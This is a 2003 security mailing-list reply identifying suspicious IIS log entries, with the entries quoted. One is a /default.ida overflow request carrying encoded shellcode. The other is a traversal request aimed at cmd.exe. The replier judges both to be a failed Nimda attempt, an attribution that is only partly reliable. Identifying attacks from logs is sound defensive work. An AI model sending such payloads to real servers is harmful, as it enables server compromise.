Re: Suspicious IIS Log entry

["Tomasz Onyszko" <T.Onyszko () w2k pl>]

W dniu Tuesday, September 09, 2003 6:42 PM [GMT+1=CET],
Toby Schau <Toby.Schau () iacudiv state ia us> napisał:

> I found the following suspicious entries in my IIS log files. Does
> anyone recognize the specific vulnerabilities that are attempted to
> be exploited? [ex030809.log (20)] : 2003-08-09 05:14:10 xxx.xx.xx.xx-
> xx.xx.xx.xx 80 GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u90
>
90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
> 9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 -
>
> [ex030908.log (201)] : 2003-09-08 06:31:02 xx.xxxxx.xxx -
> xxx.xx.xxx.xx 80 GET /<Rejected-By-UrlScan>
> ~/scripts/..%255c%255c../winnt/system32/cmd.exe 404 -
> Thanks
This is pretty ol one :)  becouse it looks like Nimda try - but as You can
see 404 status at the end of this log it was unsucessfull so You don't have
to woryy about.

-- 
Tomasz Onyszko - T.Onyszko () w2k pl
http://www.w2k.pl/


---------------------------------------------------------------------------
Captus Networks 
Are you prepared for the next Sobig & Blaster? 
 - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans 
 - Precisely Define and Implement Network Security 
 - Automatically Control P2P, IM and Spam Traffic 
FIND OUT NOW -  FREE Vulnerability Assessment Toolkit 
http://www.captusnetworks.com/ads/42.htm
----------------------------------------------------------------------------